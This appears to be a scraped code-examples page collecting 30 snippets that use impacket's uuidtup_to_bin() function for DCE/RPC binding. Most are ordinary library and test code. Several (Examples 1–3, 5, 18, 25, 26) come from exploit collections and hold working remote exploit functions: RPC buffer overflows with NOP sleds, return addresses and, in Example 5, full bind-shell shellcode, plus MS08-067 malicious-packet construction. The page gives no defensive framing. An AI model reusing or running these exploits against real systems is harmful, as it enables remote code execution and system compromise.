Python impacket.uuid.uuidtup_to_bin() Examples
The following are 30
code examples of impacket.uuid.uuidtup_to_bin().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
impacket.uuid
, or try the search function
.
.
Example #1
| Source File: 070415.py From d4rkc0de with GNU General Public License v2.0 | 6 votes |
|
def DiscoverDNSport(target):
trans = transport.SMBTransport(target, 139, 'epmapper')
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
pm = epm.DCERPCEpm(dce)
handle = '\x00'*20
while 1:
dump = pm.portmap_dump(handle)
if not dump.get_entries_num():
break
handle = dump.get_handle()
entry = dump.get_entry().get_entry()
if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
port = entry.get_string_binding().split('[')[1][:-1]
return int(port)
print '[-] Could not locate DNS port; Target might not be running DNS'
Example #2
| Source File: 070105.py From d4rkc0de with GNU General Public License v2.0 | 6 votes |
|
def EnableDetailLogging(target):
trans = transport.TCPTransport(target, 6502)
#On some linux systems the following call to connect may fail due to
#no support of settimeout in socket module. Comment out that line in
#transport.py of impacket and run this script
try:
trans.connect()
except:
print 'Could not connect to target port; Target may not be running tapeeng'
sys.exit(-1)
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
#RPC request to enable detail logging
request = '\x00\x04\x08\x0c'
request += '\x02\x00\x00\x00'
request += '\x00\x00\x00\x00'
request += '\x00\x00\x00\x00'
request += '\x00\x00\x00\x00'
dce.call(43, request)
Example #3
| Source File: 070316.py From d4rkc0de with GNU General Public License v2.0 | 6 votes |
|
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
# The following DWORD gets converted to an address pointing into our
# buffer.
request = struct.pack('<L', 0x00003A7C)
request += "A" * 19608
request += "\x90\x90\xeb\x06"
# At the point of overflow EBX points to our shellcode
# Address of 'call ebx' from kernel32.dll SP4
request += struct.pack('<L', 0x7C577B03)
request += "\x90\x90\x90\x90"
request += shellcode
request += "b" * 480000
dce.call(45, request)
Example #4
| Source File: test_epm.py From Slackor with GNU General Public License v3.0 | 5 votes |
|
def rtesthept_map(self):
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
epm.hept_map(self.machine,MSRPC_UUID_SAMR)
epm.hept_map(self.machine, MSRPC_UUID_SAMR, protocol = 'ncacn_ip_tcp')
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
epm.hept_map(self.machine,MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
epm.hept_map(self.machine,MSRPC_UUID_SCMR, protocol = 'ncacn_ip_tcp')
Example #5
| Source File: 070105.py From d4rkc0de with GNU General Public License v2.0 | 5 votes |
|
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6502)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
request = '\x10\x09\xf9\x77'
request += '\x41'*1130
request += '\x90\x90\x90\x90\xeb\x08' #short jump into nops
request += '\xd2\x7b\x57\x7c' #call ebx address from kernel32.dll
request += '\x90' * 32
#Shellcode to bind shell to TCP port 3334
request += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
request += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
request += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
request += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
request += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
request += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
request += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
request += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
request += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
request += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
request += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
request += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
request += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
request += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
request += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
request += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
request += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
request += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
request += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
request += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
request += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
request += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
request += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
request += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
request += "\xba\xa6\xf5\x31\x39\x59\x23\xce"
dce.call(38, request)
Example #6
| Source File: opdump.py From Slackor with GNU General Public License v3.0 | 5 votes |
|
def main(args):
if len(args) != 4:
print("usage: opdump.py hostname port interface version")
return 1
host, port, interface, version = args[0], int(args[1]), args[2], args[3]
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
results = []
for i in range(256):
dce = trans.get_dce_rpc()
dce.connect()
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)
dce.call(i, "")
try:
dce.recv()
except Exception as e:
result = str(e)
else:
result = "success"
dce.disconnect()
results.append(result)
# trim duplicate suffixes from the back
suffix = results[-1]
while results and results[-1] == suffix:
results.pop()
for i, result in enumerate(results):
print("op %d (0x%02x): %s" % (i, i, result))
print("ops %d-%d: %s" % (len(results), 255, suffix))
Example #7
| Source File: rpcrt.py From Slackor with GNU General Public License v3.0 | 5 votes |
|
def __init__(self, transport):
DCERPC.__init__(self, transport)
self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
self.__auth_type = RPC_C_AUTHN_WINNT
self.__auth_type_callback = None
# Flags of the authenticated session. We will need them throughout the connection
self.__auth_flags = 0
self.__username = None
self.__password = None
self.__domain = ''
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = ''
self.__TGT = None
self.__TGS = None
self.__clientSigningKey = b''
self.__serverSigningKey = b''
self.__clientSealingKey = b''
self.__clientSealingHandle = b''
self.__serverSealingKey = b''
self.__serverSealingHandle = b''
self.__sequence = 0
self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
self.__callid = 1
self._ctx = 0
self.__sessionKey = None
self.__max_xmit_size = 0
self.__flags = 0
self.__cipher = None
self.__confounder = b''
self.__gss = None
Example #8
| Source File: rpcrt.py From Slackor with GNU General Public License v3.0 | 5 votes |
|
def addCallbacks(self, ifaceUUID, secondaryAddr, callbacks):
"""
adds a call back to a UUID/opnum call
:param uuid ifaceUUID: the interface UUID
:param string secondaryAddr: the secondary address to answer as part of the bind request (e.g. \\\\PIPE\\\\srvsvc)
:param dict callbacks: the callbacks for each opnum. Format is [opnum] = callback
"""
self._listenUUIDS[uuidtup_to_bin(ifaceUUID)] = {}
self._listenUUIDS[uuidtup_to_bin(ifaceUUID)]['SecondaryAddr'] = secondaryAddr
self._listenUUIDS[uuidtup_to_bin(ifaceUUID)]['CallBacks'] = callbacks
self.log("Callback added for UUID %s V:%s" % ifaceUUID)
Example #9
| Source File: ndr.py From Slackor with GNU General Public License v3.0 | 5 votes |
|
def changeTransferSyntax(self, newSyntax):
NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
if newSyntax == NDR64Syntax:
if self._isNDR64 is False:
# Ok, let's change everything
self._isNDR64 = True
for fieldName in list(self.fields.keys()):
if isinstance(self.fields[fieldName], NDR):
self.fields[fieldName].changeTransferSyntax(newSyntax)
# Finally, I change myself
if self.commonHdr64 != ():
self.commonHdr = self.commonHdr64
if self.structure64 != ():
self.structure = self.structure64
if hasattr(self, 'align64'):
self.align = self.align64
# And check whether the changes changed the data types
# if so, I need to instantiate the new ones and copy the
# old values
for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
if isinstance(self.fields[fieldName], NDR):
if fieldTypeOrClass != self.fields[fieldName].__class__ and isinstance(self.fields[fieldName], NDRPOINTERNULL) is False:
backupData = self[fieldName]
self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64)
if 'Data' in self.fields[fieldName].fields:
self.fields[fieldName].fields['Data'] = backupData
else:
self[fieldName] = backupData
else:
if self._isNDR64 is True:
# Ok, nothing for now
raise Exception('Shouldn\'t be here')
Example #10
| Source File: ndr.py From PiBunny with MIT License | 5 votes |
|
def changeTransferSyntax(self, newSyntax):
NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
if newSyntax == NDR64Syntax:
if self._isNDR64 is False:
# Ok, let's change everything
self._isNDR64 = True
for fieldName in self.fields.keys():
if isinstance(self.fields[fieldName], NDR):
self.fields[fieldName].changeTransferSyntax(newSyntax)
# Finally, I change myself
if self.commonHdr64 != ():
self.commonHdr = self.commonHdr64
if self.structure64 != ():
self.structure = self.structure64
if hasattr(self, 'align64'):
self.align = self.align64
# And check whether the changes changed the data types
# if so, I need to instantiate the new ones and copy the
# old values
for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
if isinstance(self.fields[fieldName], NDR):
if fieldTypeOrClass != self.fields[fieldName].__class__ and isinstance(self.fields[fieldName], NDRPOINTERNULL) is False:
backupData = self[fieldName]
self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64)
if self.fields[fieldName].fields.has_key('Data'):
self.fields[fieldName].fields['Data'] = backupData
else:
self[fieldName] = backupData
else:
if self._isNDR64 is True:
# Ok, nothing for now
raise
Example #11
| Source File: test_epm.py From Slackor with GNU General Public License v3.0 | 5 votes |
|
def test_hlookup(self):
resp = epm.hept_lookup(self.machine)
#for entry in resp:
# print epm.PrintStringBinding(entry['tower']['Floors'], self.machine)
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SAMR)
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SCMR)
Example #12
| Source File: opdump.py From PiBunny with MIT License | 5 votes |
|
def main(args):
if len(args) != 4:
print "usage: opdump.py hostname port interface version"
return 1
host, port, interface, version = args[0], int(args[1]), args[2], args[3]
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
results = []
for i in range(256):
dce = trans.get_dce_rpc()
dce.connect()
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)
dce.call(i, "")
try:
dce.recv()
except Exception, e:
result = str(e)
else:
result = "success"
dce.disconnect()
results.append(result)
# trim duplicate suffixes from the back
Example #13
| Source File: test_dcomrt.py From PiBunny with MIT License | 5 votes |
|
def test_RemoteGetClassObject(self):
dce, rpctransport = self.connect()
IID_IClassFactory = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046','0.0'))
scm = dcomrt.IRemoteSCMActivator(dce)
iInterface = scm.RemoteGetClassObject(comev.CLSID_EventSystem, IID_IClassFactory)
iInterface.RemRelease()
Example #14
| Source File: test_epm.py From PiBunny with MIT License | 5 votes |
|
def test_hept_map(self):
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_SAMR)
resp = epm.hept_map(self.machine, MSRPC_UUID_SAMR, protocol = 'ncacn_ip_tcp')
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_SCMR, protocol = 'ncacn_ip_tcp')
Example #15
| Source File: test_epm.py From PiBunny with MIT License | 5 votes |
|
def test_hlookup(self):
resp = epm.hept_lookup(self.machine)
#for entry in resp:
# print epm.PrintStringBinding(entry['tower']['Floors'], self.machine)
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SAMR)
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SCMR)
Example #16
| Source File: rpcrt.py From PiBunny with MIT License | 5 votes |
|
def __init__(self, transport):
DCERPC.__init__(self, transport)
self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
self.__auth_type = RPC_C_AUTHN_WINNT
self.__auth_type_callback = None
# Flags of the authenticated session. We will need them throughout the connection
self.__auth_flags = 0
self.__username = None
self.__password = None
self.__domain = ''
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = ''
self.__TGT = None
self.__TGS = None
self.__clientSigningKey = ''
self.__serverSigningKey = ''
self.__clientSealingKey = ''
self.__clientSealingHandle = ''
self.__serverSealingKey = ''
self.__serverSealingHandle = ''
self.__sequence = 0
self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
self.__callid = 1
self._ctx = 0
self.__sessionKey = None
self.__max_xmit_size = 0
self.__flags = 0
self.__cipher = None
self.__confounder = ''
self.__gss = None
Example #17
| Source File: ms08-067_check.py From sparta with GNU General Public License v3.0 | 5 votes |
|
def __bind(self):
'''
DCERPC bind to SRVSVC (Server Service) endpoint
Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html
'''
try:
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
except socket.error, _:
raise connectionException, 'unable to bind to SRVSVC endpoint'
Example #18
| Source File: ms08-067_exploit_7132.py From WHP with Do What The F*ck You Want To Public License | 5 votes |
|
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
Example #19
| Source File: test_dcomrt.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
|
def test_RemoteGetClassObject(self):
dce, rpctransport = self.connect()
IID_IClassFactory = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046','0.0'))
scm = dcomrt.IRemoteSCMActivator(dce)
iInterface = scm.RemoteGetClassObject(comev.CLSID_EventSystem, IID_IClassFactory)
iInterface.RemRelease()
Example #20
| Source File: test_epm.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
|
def test_hept_map(self):
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_SAMR)
resp = epm.hept_map(self.machine, MSRPC_UUID_SAMR, protocol = 'ncacn_ip_tcp')
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_SCMR, protocol = 'ncacn_ip_tcp')
Example #21
| Source File: test_epm.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
|
def test_hlookup(self):
resp = epm.hept_lookup(self.machine)
#for entry in resp:
# print epm.PrintStringBinding(entry['tower']['Floors'], self.machine)
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SAMR)
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SCMR)
Example #22
| Source File: rpcrt.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
|
def __init__(self, transport):
DCERPC.__init__(self, transport)
self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
self.__auth_type = RPC_C_AUTHN_WINNT
self.__auth_type_callback = None
# Flags of the authenticated session. We will need them throughout the connection
self.__auth_flags = 0
self.__username = None
self.__password = None
self.__domain = ''
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = ''
self.__TGT = None
self.__TGS = None
self.__clientSigningKey = ''
self.__serverSigningKey = ''
self.__clientSealingKey = ''
self.__clientSealingHandle = ''
self.__serverSealingKey = ''
self.__serverSealingHandle = ''
self.__sequence = 0
self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
self.__callid = 1
self._ctx = 0
self.__sessionKey = None
self.__max_xmit_size = 0
self.__flags = 0
self.__cipher = None
self.__confounder = ''
self.__gss = None
Example #23
| Source File: rpcrt.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
|
def addCallbacks(self, ifaceUUID, secondaryAddr, callbacks):
"""
adds a call back to a UUID/opnum call
:param uuid ifaceUUID: the interface UUID
:param string secondaryAddr: the secondary address to answer as part of the bind request (e.g. \\\\PIPE\\\\srvsvc)
:param dict callbacks: the callbacks for each opnum. Format is [opnum] = callback
"""
self._listenUUIDS[uuidtup_to_bin(ifaceUUID)] = {}
self._listenUUIDS[uuidtup_to_bin(ifaceUUID)]['SecondaryAddr'] = secondaryAddr
self._listenUUIDS[uuidtup_to_bin(ifaceUUID)]['CallBacks'] = callbacks
self.log("Callback added for UUID %s V:%s" % ifaceUUID)
Example #24
| Source File: ndr.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
|
def changeTransferSyntax(self, newSyntax):
NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
if newSyntax == NDR64Syntax:
if self._isNDR64 is False:
# Ok, let's change everything
self._isNDR64 = True
for fieldName in self.fields.keys():
if isinstance(self.fields[fieldName], NDR):
self.fields[fieldName].changeTransferSyntax(newSyntax)
# Finally, I change myself
if self.commonHdr64 != ():
self.commonHdr = self.commonHdr64
if self.structure64 != ():
self.structure = self.structure64
if hasattr(self, 'align64'):
self.align = self.align64
# And check whether the changes changed the data types
# if so, I need to instantiate the new ones and copy the
# old values
for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
if isinstance(self.fields[fieldName], NDR):
if fieldTypeOrClass != self.fields[fieldName].__class__ and isinstance(self.fields[fieldName], NDRPOINTERNULL) is False:
backupData = self[fieldName]
self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64)
if self.fields[fieldName].fields.has_key('Data'):
self.fields[fieldName].fields['Data'] = backupData
else:
self[fieldName] = backupData
else:
if self._isNDR64 is True:
# Ok, nothing for now
raise
Example #25
| Source File: 070415.py From d4rkc0de with GNU General Public License v2.0 | 5 votes |
|
def ExploitDNS(target, port):
trans = transport.TCPTransport(target, port)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))
dce.call(0x01, stub)
Example #26
| Source File: ms08-067_exploit_31874.py From WHP with Do What The F*ck You Want To Public License | 5 votes |
|
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
Example #27
| Source File: test_dcomrt.py From cracke-dit with MIT License | 5 votes |
|
def test_RemoteGetClassObject(self):
dce, rpctransport = self.connect()
IID_IClassFactory = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046','0.0'))
scm = dcomrt.IRemoteSCMActivator(dce)
iInterface = scm.RemoteGetClassObject(comev.CLSID_EventSystem, IID_IClassFactory)
iInterface.RemRelease()
Example #28
| Source File: test_epm.py From cracke-dit with MIT License | 5 votes |
|
def test_hept_map(self):
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_SAMR)
resp = epm.hept_map(self.machine, MSRPC_UUID_SAMR, protocol = 'ncacn_ip_tcp')
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
resp = epm.hept_map(self.machine,MSRPC_UUID_SCMR, protocol = 'ncacn_ip_tcp')
Example #29
| Source File: test_epm.py From cracke-dit with MIT License | 5 votes |
|
def test_hlookup(self):
resp = epm.hept_lookup(self.machine)
#for entry in resp:
# print epm.PrintStringBinding(entry['tower']['Floors'], self.machine)
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC', '1.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SAMR)
MSRPC_UUID_ATSVC = uuidtup_to_bin(('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_ATSVC)
MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))
resp = epm.hept_lookup(self.machine, inquiry_type = epm.RPC_C_EP_MATCH_BY_IF, ifId = MSRPC_UUID_SCMR)
Example #30
| Source File: rpcrt.py From cracke-dit with MIT License | 5 votes |
|
def __init__(self, transport):
DCERPC.__init__(self, transport)
self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
self.__auth_type = RPC_C_AUTHN_WINNT
self.__auth_type_callback = None
# Flags of the authenticated session. We will need them throughout the connection
self.__auth_flags = 0
self.__username = None
self.__password = None
self.__domain = ''
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = ''
self.__TGT = None
self.__TGS = None
self.__clientSigningKey = ''
self.__serverSigningKey = ''
self.__clientSealingKey = ''
self.__clientSealingHandle = ''
self.__serverSealingKey = ''
self.__serverSealingHandle = ''
self.__sequence = 0
self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
self.__callid = 1
self._ctx = 0
self.__sessionKey = None
self.__max_xmit_size = 0
self.__flags = 0
self.__cipher = None
self.__confounder = ''
self.__gss = None
